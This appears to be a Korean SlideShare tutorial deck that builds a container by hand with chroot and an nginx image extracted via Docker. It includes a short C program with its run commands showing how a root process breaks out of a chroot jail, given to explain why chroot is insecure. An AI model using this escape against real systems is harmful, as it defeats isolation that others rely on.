SlideShare ist ein Scribd-Unternehmen logo

도커없이 컨테이너 만들기 1편

Sam Kim
Sam Kim

도커 없이 리눅스 커맨드만으로 컨테이너를 완성해 봅니다

Software
1 von 48
Downloaden Sie, um offline zu lesen
도커 없이 컨테이너 만들기 1편 Sam.0 실습과 함께 완성해보는
실습은 . . . ● 맥 환경에서 VirtualBox + Vagrant 기반으로 준비되었습니다 ○ 맥 이외의 OS 환경도 괜찮습니다만 ○ 원활한 실습을 위해서 ○ “VirtualBox or VMware + Vagrant”는 권장드립니다. ● 실습환경 구성을 위한 Vagrantfile을 제공합니다. 실습을 위한 사전 준비 사항
Vagrantfile ● 오른쪽의 텍스트를 복사하신 후 ● 로컬에 Vagrantfile로 저장하여 사용하면 됩니다. ● vagrant 사용법은 공식문서를 참고해 주세요 https://www.vagrantup.com/docs/i ndex 실습을 위한 사전 준비 사항 BOX_IMAGE = "bento/ubuntu-18.04" HOST_NAME = "ubuntu1804" $pre_install = <<-SCRIPT echo ">>>> pre-install <<<<<<" sudo apt-get update && sudo apt-get -y install gcc && sudo apt-get -y install make && sudo apt-get -y install pkg-config && sudo apt-get -y install libseccomp-dev && sudo apt-get -y install tree && sudo apt-get -y install jq && sudo apt-get -y install bridge-utils echo ">>>> install go <<<<<<" curl -O https://storage.googleapis.com/golang/go1.15.7.linux-amd64.tar.gz > /dev/null 2>&1 && tar xf go1.15.7.linux-amd64.tar.gz && sudo mv go /usr/local/ && echo 'PATH=$PATH:/usr/local/go/bin' | tee /home/vagrant/.bash_profile echo ">>>>> install docker <<<<<<" sudo apt-get -y install apt-transport-https ca-certificates curl gnupg-agent software-properties-common > /dev/null 2>&1 && sudo curl -fsSL https://download.docker.com/linux/ubuntu/gpg | sudo apt-key add - && sudo add-apt-repository "deb [arch=amd64] https://download.docker.com/linux/ubuntu $(lsb_release -cs) stable" && sudo apt-get update && sudo apt-get -y install docker-ce docker-ce-cli containerd.io > /dev/null 2>&1 SCRIPT Vagrant.configure("2") do |config| config.vm.define HOST_NAME do |subconfig| subconfig.vm.box = BOX_IMAGE subconfig.vm.hostname = HOST_NAME subconfig.vm.network :private_network, ip: "192.168.104.2" subconfig.vm.provider "virtualbox" do |v| v.memory = 1536 v.cpus = 2 end subconfig.vm.provision "shell", inline: $pre_install end end
# sudo -Es 실습 계정 (root) # cd /tmp 실습 폴더 vagrant + virtual vm ubuntu 18.04 docker 20.10.5 * 도커 이미지 다운로드 및 컨테이너 비교를 위한 용도로 사용합니다. 기타 설치된 툴 ~ tree, jq, brctl, … 등 실습을 위한 툴 Vagrantfile 제공 환경 실습을 위한 사전 준비 사항
컨테이너 ? 도커? 클라우드 ? ubuntu:latest ..OS? VMware 같은 건가?
도커 ? https://docs.docker.com/get-started/overview/ 회사명 이면서 제품명 → 컨테이너를 다루는 플랫폼
컨테이너 ? 격리된 환경과 통제된 리소스에서 실행되는 프로세스 그룹 호스트 안에 따로 한 살림 차려준달까 시스템리소스 (cpu, mem, ..) processes processes 집 안의 집 ~ “컴퓨터 안 의 컴퓨터” https://jessicagreben.medium.com/what-is-the-difference-between-a-process-a-container-and-a-vm-f36ba0f8a8f7
컨테이너? VM 보다 가볍다 Infrastructure OS Hypervisor Guest OS Guest OS Guest OS App App App Strong Isolation 가상머신(VM) 환경 Infrastructure OS Container Engine App App App container container container Weak Isolation 컨테이너 환경
컨테이너? VM 보다 가볍다 왜 ? Guest OS가 없다 (호스트 OS를 공유) Infrastructure OS Hypervisor Guest OS Guest OS Guest OS App App App 스트롱 ~ Isolation 가상머신(VM) 환경 Infrastructure OS Container Engine App App App container container container 약한 Isolation 컨테이너 환경
컨테이너 vs VM https://artistdata.tistory.com/5 최대소수연산(sysbench) 소요시간 비교 압축 성능 비교 (LZMA benchmark) for CPU performance RAM Speed 비교 디스크 I/O 성능비교 (IOzone benchmark) 성능비교 ~ 컨테이너가 빠름 빠름 ~
1979 chroot 2000 Jails 2013 2002 mount ns 2006 uts, ipc ns 2009 net ns 2012 user ns LXC (LinuX Containers) 2008 pid ns, cgroup 컨테이너의 역사 컨테이너의 시작은 1979년 chroot 로 부터 ~
chroot ? change root directory ‘ / ’ 리눅스 파일시스템은 모든 파일 및 디렉토리가 “root (/)” 로 부터 시작된다. bin boot chroot etc lib proc usr var / (root filesystem)
chroot ? change root directory ‘ / ’ 원격 유저(FTP 등)를 특정 디렉토리 경로에 가두기 위한 용도 등으로 사용됨 bin boot chroot etc lib proc usr var / (root filesystem) bin lib home usr / (Fake root) Hacker In Jail Hacker 따라서.. 특정 디렉토리 경로를 root로 지정할 수 있으면 해당 경로에 프로세스를 가둘 수 있다는 점에 착안 ~
chroot 실습 chroot로 컨테이너를 만들어 보자 bin boot chroot etc lib proc usr var / (root filesystem) bin lib home usr / (Fake root) Hacker In Jail
chroot 실습 chroot는 새로운 경로(NEWROOT)와 실행할 커맨드를 인자로 받습니다. # man chroot ~ 커맨드를 따로 지정하지 않으면 default 커맨드 (/bin/sh) 로 동작합니다.
# mkdir new-root # chroot new-root /bin/bash new-root 폴더를 만들고, chroot를 해봅시다 chroot 실습
# chroot new-root /bin/bash chroot: failed to run command ‘/bin/bash’: No such file or directory chroot 실습 ~ chroot의 커맨드(/bin/bash)는 new-root 경로를 기준으로 합니다 즉, 실행할 커맨드가 경로에 없다고 에러 빽 ~
chroot 실습 # which bash /bin/bash # mkdir -p new-root/bin # cp /bin/bash new-root/bin /bin/bash 파일을 new-root/bin 으로 복사해주세요
# chroot new-root /bin/bash chroot: failed to run command ‘/bin/bash’: No such file or directory chroot 실습 왜 또 ~ ㅠ 다시 실행해 보지만 …
# ldd /bin/bash ldd prints the shared libraries required 참고) man ldd (list dynamic dependencies) /bin/bash에서 실행 시 참조하는 라이브러리들이 있었군요 chroot 실습
chroot 실습 bash 실행을 위한 라이브러리도 복사해주세요 한땀한땀 ~ # mkdir new-root/lib # cp /lib/x86_64-linux-gnu/libtinfo.so.5 new-root/lib/ # cp /lib/x86_64-linux-gnu/libdl.so.2 new-root/lib/ # cp /lib/x86_64-linux-gnu/libc.so.6 new-root/lib/ # mkdir new-root/lib64 # cp /lib64/ld-linux-x86-64.so.2 new-root/lib64/ Q) linux-vdso.so.1 은 왜 복사안해요 ? A) *-vdso 는 커널레벨에서제공되는 공유 라이브러리입니다. 참고) man vdso (virtual dynamic shared object)
chroot 실습 # chroot new-root /bin/bash bash-4.4# 성공 ~ 오.. 뭔가 다른 터미널에 들어온 기분이네요
chroot 실습 But … 세상일이라는게 호락호락 하지 않네요 ...
chroot 실습 ls 명령어도 복사해 넣어봅시다 먼저, exit 를 입력하여 chroot로 실행된 프로세스를 종료합니다 bash-4.4# exit #
chroot 실습 ls 명령어도 복사해 넣어봅시다 # cp /bin/ls new-root/bin # cp /lib/x86_64-linux-gnu/libselinux.so.1 . . . 이하 생략 . . . 직접 하실 수 있겠지요 ? 앞서 bash 복사와 동일합니다 :-) 한땀한땀 ~ cp 해주세요
chroot 실습 다시 chroot 로 new-root의 bash를 실행해 보세요 # chroot new-root /bin/bash bash-4.4# 이번에는 ls 도 동작합니다
chroot 실습 ls 로 확인해보니 “/” (root) 가 달라졌습니다 원래 root (“/”)
bin boot chroot etc lib proc usr var / (root filesystem) bin lib home usr / (Fake root) Hacker In Jail chroot 실습 그리고, root 밖으로 벗어날 수 없습니다 원래 root (“/”)
chroot 실습 cat, mkdir, ps, … 원하는 프로그램을 복사하고 chroot 에서 실행해 보세요 그렇습니다 . 사용하고 싶은 명령어는 한땀한땀 넣어주어야 합니다. bash와 라이브러리들을 복사해온 것 처럼 말이죠
chroot 실습 new-root copy copy copy cat, mkdir, ps, … 원하는 프로그램을 복사하고 chroot 에서 실행해 보세요
chroot 실습 필요한 프로그램들은 이처럼 한땀한땀 복사해 넣어야 합니다. 저는 욕심을 좀 부려보았습니다. ps 를 해보기 위해 mount 까지 넣어보았습니다. new-root
그것이 바로 이미지(image) 입니다 :-) 흔히들, “도커 이미지”라고 부르는 그것 말이죠. 일종의 tarball 이라고 생각하면 됩니다. nginx image tarball 누군가 미리 필요한 것들을 모아 둔 것을 가져다 쓰면 편하겠죠 ? chroot + 이미지 실습
말 나온김에 이미지를 가져와 볼까요 ? nginx-root # cd /tmp # mkdir nginx-root 일단, /tmp 에 “nginx-root” 라는 새로운 폴더를 하나 만들어 줍시다. chroot + 이미지 실습
새로 만든 nginx-root 라는 경로에 nginx 이미지를 풀어줄 건데요 이 명령은 아래의 단계를 수행합니다. 1. 이미지 저장소로 부터 nginx:latest 이미지를 가지고 와서 2. tarball로 export (압축) 한 것을 3. nginx-root 경로에 풀어줍니다. 말 나온김에 이미지를 가져와 볼까요 ? nginx-root nginx image tarball # docker export $(docker create nginx:latest) | tar -C nginx-root -xvf - chroot + 이미지 실습
이처럼 필요한 이미지를 풀어놓은 경로를 chroot 를 해주면 ~ # chroot nginx-root /bin/sh # ls 명령도 동작을 하네요 ~ 누군가 필요한 것들을 잘 모아 놓았습니다. chroot + 이미지 실습
nginx image tarball 의 내용과 동일합니다 … 압축을 풀어놓은 그대로죠 ㅎㅎ nginx image tarball = 동일 chroot + 이미지 실습
nginx 도 한번 실행해 볼까요? chroot + 이미지 실습
터미널창을 하나 더 열어서 실제 접속이 되는지 확인해 보세요 # curl localhost 터미널 #2 접속이 잘 되었다면 성공 ~ chroot + 이미지 실습
지금까지 nginx 이미지와 chroot를 이용하여 nginx 웹서버를 실행해 보았습니다 nginx image tarball nginx-root “실제 컨테이너 처럼” 프로그램 실행에 필요한 파일들을 모아놓고 해당 경로를 root로 하여 프로세스를 실행하는 것을 재현해 보았는데요 chroot + 이미지 실습
그런데 말입니다 … chroot에는 치명적인 문제가 있습니다 new-root chroot chroot 문제점
chroot 문제점 그것은 바로 ~~~ 탈옥이 가능하다는 점입니다 … bin boot chroot etc lib proc usr var / (root filesystem) bin lib home usr / (Fake root) Angry Hacker
chroot 에서 탈출해보자 탈옥 코드 # vi escape_chroot.c #include <sys/stat.h> #include <unistd.h> int main(void) { mkdir(".out", 0755); chroot(".out"); chdir("../../../../../"); chroot("."); return execl("/bin/sh", "-i", NULL); }
chroot 에서 탈출해보자 탈옥 코드를 컴파일하고 new-root에 복사합니다 # gcc -o new-root/escape_chroot escape_chroot.c # chroot new-root /bin/bash bash-4.4# ls / change root 는 잘됐군 ~
chroot 에서 탈출해보자 escape_chroot 를 실행하면 ... # gcc -o new-root/escape_chroot escape_chroot.c # chroot new-root bash-4.4# ls / bash-4.4# ./escape_chroot # ls / bin escape_chroot lib usr / (Fake root) 탈옥
탈옥에 성공했다는 것은 … 실제 루트 (/)를 취득했다는 얘기가 되겠죠 ㅠ.ㅠ chroot 에서 탈출해보자 bin escape_chroot lib usr / (Fake root)
chroot 문제점 탈옥 말고도 … chroot 가 가지고 있는 문제점은 많습니다. ~ 호스트와의 격리 문제, 리소스 제한, 보안 ... 앞으로 이러한 문제들 하나하나 해결해 가면서 함께 완전한 컨테이너를 만들어 보시죠 :-)
2편 예고 다음 편에서는 chroot 의 탈옥문제를 해결하는 방법으로써 pivot_root에 대해 다루도록 하겠습니다
END

Empfohlen

도커 없이 컨테이너 만들기 2편
도커 없이 컨테이너 만들기 2편도커 없이 컨테이너 만들기 2편
도커 없이 컨테이너 만들기 2편
Sam Kim
 
도커 없이 컨테이너 만들기 3편
도커 없이 컨테이너 만들기 3편도커 없이 컨테이너 만들기 3편
도커 없이 컨테이너 만들기 3편
Sam Kim
 
Make container without_docker_6-overlay-network_1
Make container without_docker_6-overlay-network_1 Make container without_docker_6-overlay-network_1
Make container without_docker_6-overlay-network_1
Sam Kim
 
Tomcat Server
Tomcat ServerTomcat Server
Tomcat Server
Anirban Majumdar
 
오픈소스컨설팅 클러스터제안 V1.0
오픈소스컨설팅 클러스터제안 V1.0오픈소스컨설팅 클러스터제안 V1.0
오픈소스컨설팅 클러스터제안 V1.0
sprdd
 
오픈스택 커뮤니티 소개 및 기술 동향
오픈스택 커뮤니티 소개 및 기술 동향오픈스택 커뮤니티 소개 및 기술 동향
오픈스택 커뮤니티 소개 및 기술 동향
Nalee Jang
 
Kubernetes Introduction
Kubernetes IntroductionKubernetes Introduction
Kubernetes Introduction
Peng Xiao
 
[오픈소스컨설팅] 쿠버네티스와 쿠버네티스 on 오픈스택 비교 및 구축 방법
[오픈소스컨설팅] 쿠버네티스와 쿠버네티스 on 오픈스택 비교 및 구축 방법[오픈소스컨설팅] 쿠버네티스와 쿠버네티스 on 오픈스택 비교 및 구축 방법
[오픈소스컨설팅] 쿠버네티스와 쿠버네티스 on 오픈스택 비교 및 구축 방법
Open Source Consulting
 

Empfohlen

도커 없이 컨테이너 만들기 2편
도커 없이 컨테이너 만들기 2편도커 없이 컨테이너 만들기 2편
도커 없이 컨테이너 만들기 2편
Sam Kim
 
도커 없이 컨테이너 만들기 3편
도커 없이 컨테이너 만들기 3편도커 없이 컨테이너 만들기 3편
도커 없이 컨테이너 만들기 3편
Sam Kim
 
Make container without_docker_6-overlay-network_1
Make container without_docker_6-overlay-network_1 Make container without_docker_6-overlay-network_1
Make container without_docker_6-overlay-network_1
Sam Kim
 
Tomcat Server
Tomcat ServerTomcat Server
Tomcat Server
Anirban Majumdar
 
오픈소스컨설팅 클러스터제안 V1.0
오픈소스컨설팅 클러스터제안 V1.0오픈소스컨설팅 클러스터제안 V1.0
오픈소스컨설팅 클러스터제안 V1.0
sprdd
 
오픈스택 커뮤니티 소개 및 기술 동향
오픈스택 커뮤니티 소개 및 기술 동향오픈스택 커뮤니티 소개 및 기술 동향
오픈스택 커뮤니티 소개 및 기술 동향
Nalee Jang
 
Kubernetes Introduction
Kubernetes IntroductionKubernetes Introduction
Kubernetes Introduction
Peng Xiao
 
[오픈소스컨설팅] 쿠버네티스와 쿠버네티스 on 오픈스택 비교 및 구축 방법
[오픈소스컨설팅] 쿠버네티스와 쿠버네티스 on 오픈스택 비교 및 구축 방법[오픈소스컨설팅] 쿠버네티스와 쿠버네티스 on 오픈스택 비교 및 구축 방법
[오픈소스컨설팅] 쿠버네티스와 쿠버네티스 on 오픈스택 비교 및 구축 방법
Open Source Consulting
 
Embedded Linux Quick Start Guide v1.5
Embedded Linux Quick Start Guide v1.5Embedded Linux Quick Start Guide v1.5
Embedded Linux Quick Start Guide v1.5
Chris Simmonds
 
Helm intro
Helm introHelm intro
Helm intro
Haggai Philip Zagury
 
Tomcat and apache httpd training
Tomcat and apache httpd trainingTomcat and apache httpd training
Tomcat and apache httpd training
Franck SIMON
 
Docker cheat-sheet
Docker cheat-sheetDocker cheat-sheet
Docker cheat-sheet
Peđa Delić
 
Ansible presentation
Ansible presentationAnsible presentation
Ansible presentation
John Lynch
 
Kubernetes Deployment Tutorial | Kubernetes Tutorial For Beginners | Kubernet...
Kubernetes Deployment Tutorial | Kubernetes Tutorial For Beginners | Kubernet...Kubernetes Deployment Tutorial | Kubernetes Tutorial For Beginners | Kubernet...
Kubernetes Deployment Tutorial | Kubernetes Tutorial For Beginners | Kubernet...
Edureka!
 
Ansible
AnsibleAnsible
Ansible
Raul Leite
 
Introduction to Linux basic
Introduction to Linux basicIntroduction to Linux basic
Introduction to Linux basic
f114n
 
[CNCF TAG-Runtime 2022-10-06] Lima
[CNCF TAG-Runtime 2022-10-06] Lima[CNCF TAG-Runtime 2022-10-06] Lima
[CNCF TAG-Runtime 2022-10-06] Lima
Akihiro Suda
 
IBM JVM 소개 - Oracle JVM 과 비교
IBM JVM 소개 - Oracle JVM 과 비교IBM JVM 소개 - Oracle JVM 과 비교
IBM JVM 소개 - Oracle JVM 과 비교
JungWoon Lee
 
Disaggregating Ceph using NVMeoF
Disaggregating Ceph using NVMeoFDisaggregating Ceph using NVMeoF
Disaggregating Ceph using NVMeoF
ShapeBlue
 
Introduction to Kubernetes Workshop
Introduction to Kubernetes WorkshopIntroduction to Kubernetes Workshop
Introduction to Kubernetes Workshop
Bob Killen
 
VMware vSphere
VMware vSphereVMware vSphere
VMware vSphere
零壹科技股份有限公司
 
왜 쿠버네티스는 systemd로 cgroup을 관리하려고 할까요
왜 쿠버네티스는 systemd로 cgroup을 관리하려고 할까요왜 쿠버네티스는 systemd로 cgroup을 관리하려고 할까요
왜 쿠버네티스는 systemd로 cgroup을 관리하려고 할까요
Jo Hoon
 
[AWSKRUG 컨테이너 소모임] Rancher 기본 입문
[AWSKRUG 컨테이너 소모임] Rancher 기본 입문[AWSKRUG 컨테이너 소모임] Rancher 기본 입문
[AWSKRUG 컨테이너 소모임] Rancher 기본 입문
Hyunmin Kim
 
Introduction to Ansible
Introduction to AnsibleIntroduction to Ansible
Introduction to Ansible
CoreStack
 
Introduction to Linux
Introduction to LinuxIntroduction to Linux
Introduction to Linux
sureskal
 
Alphorm.com Formation KVM
Alphorm.com Formation KVMAlphorm.com Formation KVM
Alphorm.com Formation KVM
Alphorm
 
Docker internals
Docker internalsDocker internals
Docker internals
Rohit Jnagal
 
Introduction and Deep Dive Into Containerd
Introduction and Deep Dive Into ContainerdIntroduction and Deep Dive Into Containerd
Introduction and Deep Dive Into Containerd
Kohei Tokunaga
 
[NDC18] 만들고 붓고 부수고 - 〈야생의 땅: 듀랑고〉 서버 관리 배포 이야기
[NDC18] 만들고 붓고 부수고 - 〈야생의 땅: 듀랑고〉 서버 관리 배포 이야기[NDC18] 만들고 붓고 부수고 - 〈야생의 땅: 듀랑고〉 서버 관리 배포 이야기
[NDC18] 만들고 붓고 부수고 - 〈야생의 땅: 듀랑고〉 서버 관리 배포 이야기
Chanwoong Kim
 
리얼리눅스 제 1 회 세미나: "리눅스, 제대로 알고 코딩하자!"
리얼리눅스 제 1 회 세미나: "리눅스, 제대로 알고 코딩하자!"리얼리눅스 제 1 회 세미나: "리눅스, 제대로 알고 코딩하자!"
리얼리눅스 제 1 회 세미나: "리눅스, 제대로 알고 코딩하자!"
리얼리눅스
 

Weitere ähnliche Inhalte

Was ist angesagt?

Kubernetes Deployment Tutorial | Kubernetes Tutorial For Beginners | Kubernet...
Kubernetes Deployment Tutorial | Kubernetes Tutorial For Beginners | Kubernet...Kubernetes Deployment Tutorial | Kubernetes Tutorial For Beginners | Kubernet...
Kubernetes Deployment Tutorial | Kubernetes Tutorial For Beginners | Kubernet...
Edureka!
 
Alphorm.com Formation KVM
Alphorm.com Formation KVMAlphorm.com Formation KVM
Alphorm.com Formation KVM
Alphorm
 

Was ist angesagt? (20)

Embedded Linux Quick Start Guide v1.5
Embedded Linux Quick Start Guide v1.5Embedded Linux Quick Start Guide v1.5
Embedded Linux Quick Start Guide v1.5
 
Helm intro
Helm introHelm intro
Helm intro
 
Tomcat and apache httpd training
Tomcat and apache httpd trainingTomcat and apache httpd training
Tomcat and apache httpd training
 
Docker cheat-sheet
Docker cheat-sheetDocker cheat-sheet
Docker cheat-sheet
 
Ansible presentation
Ansible presentationAnsible presentation
Ansible presentation
 
Kubernetes Deployment Tutorial | Kubernetes Tutorial For Beginners | Kubernet...
Kubernetes Deployment Tutorial | Kubernetes Tutorial For Beginners | Kubernet...Kubernetes Deployment Tutorial | Kubernetes Tutorial For Beginners | Kubernet...
Kubernetes Deployment Tutorial | Kubernetes Tutorial For Beginners | Kubernet...
 
Ansible
AnsibleAnsible
Ansible
 
Introduction to Linux basic
Introduction to Linux basicIntroduction to Linux basic
Introduction to Linux basic
 
[CNCF TAG-Runtime 2022-10-06] Lima
[CNCF TAG-Runtime 2022-10-06] Lima[CNCF TAG-Runtime 2022-10-06] Lima
[CNCF TAG-Runtime 2022-10-06] Lima
 
IBM JVM 소개 - Oracle JVM 과 비교
IBM JVM 소개 - Oracle JVM 과 비교IBM JVM 소개 - Oracle JVM 과 비교
IBM JVM 소개 - Oracle JVM 과 비교
 
Disaggregating Ceph using NVMeoF
Disaggregating Ceph using NVMeoFDisaggregating Ceph using NVMeoF
Disaggregating Ceph using NVMeoF
 
Introduction to Kubernetes Workshop
Introduction to Kubernetes WorkshopIntroduction to Kubernetes Workshop
Introduction to Kubernetes Workshop
 
VMware vSphere
VMware vSphereVMware vSphere
VMware vSphere
 
왜 쿠버네티스는 systemd로 cgroup을 관리하려고 할까요
왜 쿠버네티스는 systemd로 cgroup을 관리하려고 할까요왜 쿠버네티스는 systemd로 cgroup을 관리하려고 할까요
왜 쿠버네티스는 systemd로 cgroup을 관리하려고 할까요
 
[AWSKRUG 컨테이너 소모임] Rancher 기본 입문
[AWSKRUG 컨테이너 소모임] Rancher 기본 입문[AWSKRUG 컨테이너 소모임] Rancher 기본 입문
[AWSKRUG 컨테이너 소모임] Rancher 기본 입문
 
Introduction to Ansible
Introduction to AnsibleIntroduction to Ansible
Introduction to Ansible
 
Introduction to Linux
Introduction to LinuxIntroduction to Linux
Introduction to Linux
 
Alphorm.com Formation KVM
Alphorm.com Formation KVMAlphorm.com Formation KVM
Alphorm.com Formation KVM
 
Docker internals
Docker internalsDocker internals
Docker internals
 
Introduction and Deep Dive Into Containerd
Introduction and Deep Dive Into ContainerdIntroduction and Deep Dive Into Containerd
Introduction and Deep Dive Into Containerd
 

Ähnlich wie 도커없이 컨테이너 만들기 1편

내컴에선 잘되던데? Vagrant로 서버와 동일한 개발환경 꾸미기
내컴에선 잘되던데? Vagrant로 서버와 동일한 개발환경 꾸미기내컴에선 잘되던데? Vagrant로 서버와 동일한 개발환경 꾸미기
내컴에선 잘되던데? Vagrant로 서버와 동일한 개발환경 꾸미기
소리 강
 

Ähnlich wie 도커없이 컨테이너 만들기 1편 (20)

[NDC18] 만들고 붓고 부수고 - 〈야생의 땅: 듀랑고〉 서버 관리 배포 이야기
[NDC18] 만들고 붓고 부수고 - 〈야생의 땅: 듀랑고〉 서버 관리 배포 이야기[NDC18] 만들고 붓고 부수고 - 〈야생의 땅: 듀랑고〉 서버 관리 배포 이야기
[NDC18] 만들고 붓고 부수고 - 〈야생의 땅: 듀랑고〉 서버 관리 배포 이야기
 
리얼리눅스 제 1 회 세미나: "리눅스, 제대로 알고 코딩하자!"
리얼리눅스 제 1 회 세미나: "리눅스, 제대로 알고 코딩하자!"리얼리눅스 제 1 회 세미나: "리눅스, 제대로 알고 코딩하자!"
리얼리눅스 제 1 회 세미나: "리눅스, 제대로 알고 코딩하자!"
 
[오픈소스컨설팅]Docker on Kubernetes v1
[오픈소스컨설팅]Docker on Kubernetes v1[오픈소스컨설팅]Docker on Kubernetes v1
[오픈소스컨설팅]Docker on Kubernetes v1
 
XECon2015 :: [1-5] 김훈민 - 서버 운영자가 꼭 알아야 할 Docker
XECon2015 :: [1-5] 김훈민 - 서버 운영자가 꼭 알아야 할 DockerXECon2015 :: [1-5] 김훈민 - 서버 운영자가 꼭 알아야 할 Docker
XECon2015 :: [1-5] 김훈민 - 서버 운영자가 꼭 알아야 할 Docker
 
[1A6]Docker로 보는 서버 운영의 미래
[1A6]Docker로 보는 서버 운영의 미래[1A6]Docker로 보는 서버 운영의 미래
[1A6]Docker로 보는 서버 운영의 미래
 
Docker 사용가이드 public v0.1
Docker 사용가이드 public v0.1Docker 사용가이드 public v0.1
Docker 사용가이드 public v0.1
 
Docker.소개.30 m
Docker.소개.30 mDocker.소개.30 m
Docker.소개.30 m
 
[오픈소스컨설팅]쿠버네티스를 활용한 개발환경 구축
[오픈소스컨설팅]쿠버네티스를 활용한 개발환경 구축[오픈소스컨설팅]쿠버네티스를 활용한 개발환경 구축
[오픈소스컨설팅]쿠버네티스를 활용한 개발환경 구축
 
망고100 보드로 놀아보자 11
망고100 보드로 놀아보자 11망고100 보드로 놀아보자 11
망고100 보드로 놀아보자 11
 
우분투에 시스템콜 추가하기
우분투에 시스템콜 추가하기우분투에 시스템콜 추가하기
우분투에 시스템콜 추가하기
 
[H3 2012] 내컴에선 잘되던데? - vagrant로 서버와 동일한 개발환경 꾸미기
[H3 2012] 내컴에선 잘되던데? - vagrant로 서버와 동일한 개발환경 꾸미기[H3 2012] 내컴에선 잘되던데? - vagrant로 서버와 동일한 개발환경 꾸미기
[H3 2012] 내컴에선 잘되던데? - vagrant로 서버와 동일한 개발환경 꾸미기
 
내컴에선 잘되던데? Vagrant로 서버와 동일한 개발환경 꾸미기
내컴에선 잘되던데? Vagrant로 서버와 동일한 개발환경 꾸미기내컴에선 잘되던데? Vagrant로 서버와 동일한 개발환경 꾸미기
내컴에선 잘되던데? Vagrant로 서버와 동일한 개발환경 꾸미기
 
[17.01.19] docker introduction (Korean Version)
[17.01.19] docker introduction (Korean Version)[17.01.19] docker introduction (Korean Version)
[17.01.19] docker introduction (Korean Version)
 
[Nomad connection]docker seminar 15.10.08
[Nomad connection]docker seminar 15.10.08[Nomad connection]docker seminar 15.10.08
[Nomad connection]docker seminar 15.10.08
 
cross compile
cross compilecross compile
cross compile
 
Virtual Development Environment Setting
Virtual Development Environment SettingVirtual Development Environment Setting
Virtual Development Environment Setting
 
[오픈소스컨설팅]Docker on Cloud(Digital Ocean)
[오픈소스컨설팅]Docker on Cloud(Digital Ocean)[오픈소스컨설팅]Docker on Cloud(Digital Ocean)
[오픈소스컨설팅]Docker on Cloud(Digital Ocean)
 
Kafka slideshare
Kafka slideshareKafka slideshare
Kafka slideshare
 
docker on GCE ( JIRA & Confluence ) - GDG Korea Cloud
docker on GCE ( JIRA & Confluence ) - GDG Korea Clouddocker on GCE ( JIRA & Confluence ) - GDG Korea Cloud
docker on GCE ( JIRA & Confluence ) - GDG Korea Cloud
 
Deploying Hyperledger Fabric on Kubernetes.pptx
Deploying Hyperledger Fabric on Kubernetes.pptxDeploying Hyperledger Fabric on Kubernetes.pptx
Deploying Hyperledger Fabric on Kubernetes.pptx
 

도커없이 컨테이너 만들기 1편

  • 1. 도커 없이 컨테이너 만들기 1편 Sam.0 실습과 함께 완성해보는
  • 2. 실습은 . . . ● 맥 환경에서 VirtualBox + Vagrant 기반으로 준비되었습니다 ○ 맥 이외의 OS 환경도 괜찮습니다만 ○ 원활한 실습을 위해서 ○ “VirtualBox or VMware + Vagrant”는 권장드립니다. ● 실습환경 구성을 위한 Vagrantfile을 제공합니다. 실습을 위한 사전 준비 사항
  • 3. Vagrantfile ● 오른쪽의 텍스트를 복사하신 후 ● 로컬에 Vagrantfile로 저장하여 사용하면 됩니다. ● vagrant 사용법은 공식문서를 참고해 주세요 https://www.vagrantup.com/docs/i ndex 실습을 위한 사전 준비 사항 BOX_IMAGE = "bento/ubuntu-18.04" HOST_NAME = "ubuntu1804" $pre_install = <<-SCRIPT echo ">>>> pre-install <<<<<<" sudo apt-get update && sudo apt-get -y install gcc && sudo apt-get -y install make && sudo apt-get -y install pkg-config && sudo apt-get -y install libseccomp-dev && sudo apt-get -y install tree && sudo apt-get -y install jq && sudo apt-get -y install bridge-utils echo ">>>> install go <<<<<<" curl -O https://storage.googleapis.com/golang/go1.15.7.linux-amd64.tar.gz > /dev/null 2>&1 && tar xf go1.15.7.linux-amd64.tar.gz && sudo mv go /usr/local/ && echo 'PATH=$PATH:/usr/local/go/bin' | tee /home/vagrant/.bash_profile echo ">>>>> install docker <<<<<<" sudo apt-get -y install apt-transport-https ca-certificates curl gnupg-agent software-properties-common > /dev/null 2>&1 && sudo curl -fsSL https://download.docker.com/linux/ubuntu/gpg | sudo apt-key add - && sudo add-apt-repository "deb [arch=amd64] https://download.docker.com/linux/ubuntu $(lsb_release -cs) stable" && sudo apt-get update && sudo apt-get -y install docker-ce docker-ce-cli containerd.io > /dev/null 2>&1 SCRIPT Vagrant.configure("2") do |config| config.vm.define HOST_NAME do |subconfig| subconfig.vm.box = BOX_IMAGE subconfig.vm.hostname = HOST_NAME subconfig.vm.network :private_network, ip: "192.168.104.2" subconfig.vm.provider "virtualbox" do |v| v.memory = 1536 v.cpus = 2 end subconfig.vm.provision "shell", inline: $pre_install end end
  • 4. # sudo -Es 실습 계정 (root) # cd /tmp 실습 폴더 vagrant + virtual vm ubuntu 18.04 docker 20.10.5 * 도커 이미지 다운로드 및 컨테이너 비교를 위한 용도로 사용합니다. 기타 설치된 툴 ~ tree, jq, brctl, … 등 실습을 위한 툴 Vagrantfile 제공 환경 실습을 위한 사전 준비 사항
  • 6. 도커 ? https://docs.docker.com/get-started/overview/ 회사명 이면서 제품명 → 컨테이너를 다루는 플랫폼
  • 7. 컨테이너 ? 격리된 환경과 통제된 리소스에서 실행되는 프로세스 그룹 호스트 안에 따로 한 살림 차려준달까 시스템리소스 (cpu, mem, ..) processes processes 집 안의 집 ~ “컴퓨터 안 의 컴퓨터” https://jessicagreben.medium.com/what-is-the-difference-between-a-process-a-container-and-a-vm-f36ba0f8a8f7
  • 8. 컨테이너? VM 보다 가볍다 Infrastructure OS Hypervisor Guest OS Guest OS Guest OS App App App Strong Isolation 가상머신(VM) 환경 Infrastructure OS Container Engine App App App container container container Weak Isolation 컨테이너 환경
  • 9. 컨테이너? VM 보다 가볍다 왜 ? Guest OS가 없다 (호스트 OS를 공유) Infrastructure OS Hypervisor Guest OS Guest OS Guest OS App App App 스트롱 ~ Isolation 가상머신(VM) 환경 Infrastructure OS Container Engine App App App container container container 약한 Isolation 컨테이너 환경
  • 10. 컨테이너 vs VM https://artistdata.tistory.com/5 최대소수연산(sysbench) 소요시간 비교 압축 성능 비교 (LZMA benchmark) for CPU performance RAM Speed 비교 디스크 I/O 성능비교 (IOzone benchmark) 성능비교 ~ 컨테이너가 빠름 빠름 ~
  • 11. 1979 chroot 2000 Jails 2013 2002 mount ns 2006 uts, ipc ns 2009 net ns 2012 user ns LXC (LinuX Containers) 2008 pid ns, cgroup 컨테이너의 역사 컨테이너의 시작은 1979년 chroot 로 부터 ~
  • 12. chroot ? change root directory ‘ / ’ 리눅스 파일시스템은 모든 파일 및 디렉토리가 “root (/)” 로 부터 시작된다. bin boot chroot etc lib proc usr var / (root filesystem)
